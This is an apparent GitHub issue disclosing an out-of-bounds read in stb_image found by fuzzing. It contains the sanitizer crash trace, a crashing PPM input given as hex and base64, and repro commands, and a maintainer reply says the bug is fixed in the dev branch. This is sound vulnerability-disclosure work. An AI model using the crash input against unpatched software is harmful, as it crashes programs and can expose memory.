A oob-read vulnerability exists in the function stbi__load_and_postprocess_8bit in stb

[migraine-sudo]

Crash Info

UndefinedBehaviorSanitizer:DEADLYSIGNAL
==155582==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x55d181ff9001 (pc 0x55d1803a7480 bp 0x7ffe3d6470c0 sp 0x7ffe3d646850 T155582)
==155582==The signal is caused by a READ memory access.
    #0 0x55d1803a7480 in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) stbi_read_fuzzer.c
    #1 0x55d1803ad01f in LLVMFuzzerTestOneInput (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x8501f) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #2 0x55d1803635f3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x3b5f3) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #3 0x55d180362d49 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool, bool*) (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x3ad49) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #4 0x55d180364539 in fuzzer::Fuzzer::MutateAndTestOne() (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x3c539) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #5 0x55d1803650b5 in fuzzer::Fuzzer::Loop(std::vector<fuzzer::SizedFile, std::allocator<fuzzer::SizedFile> >&) (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x3d0b5) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #6 0x55d1803531f2 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x2b1f2) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #7 0x55d18037cee2 in main (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x54ee2) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #8 0x7f02d8a0ad8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #9 0x7f02d8a0ae3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #10 0x55d180347c34 in _start (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x1fc34) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)

UndefinedBehaviorSanitizer can not provide additional info.
SUMMARY: UndefinedBehaviorSanitizer: SEGV stbi_read_fuzzer.c in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int)
==155582==ABORTING
MS: 2 ChangeASCIIInt-CopyPart-; base unit: f884ca9cd651b733861ac0811006e1766fbb9a1c
0x50,0x36,0x39,0x39,0x35,0x23,0xa,0x39,0x30,0x39,0xb,0x23,0x35,0x23,0xa,0x39,0x30,0x39,0xb,0x23,0x39,0x23,0xa,0x32,0x23,
P6995#\012909\013#5#\012909\013#9#\0122#
artifact_prefix='./'; Test unit written to ./crash-6f3abb24d907f9b2ae99f8f960d997bb1a4eef17
Base64: UDY5OTUjCjkwOQsjNSMKOTA5CyM5IwoyIw==

How to Crash

Command

$ git clone https://github.com/nothings/stb.git && cd test
$ clang++ -O1 -fsanitize=fuzzer  -std=c++11 stbi_read_fuzzer.c  -o out/stbi_read_fuzzer
$ ./stbi_read_fuzzer poc

poc in attachment stb2-poc.zip

[rygorous]

Thanks for the repro! Appears to be a duplicate of #1225 or possibly #1166. Either way, your PoC does not trigger UB anymore in current dev branch, which fixes these issues. Will close as duplicate, fix will be in the next release.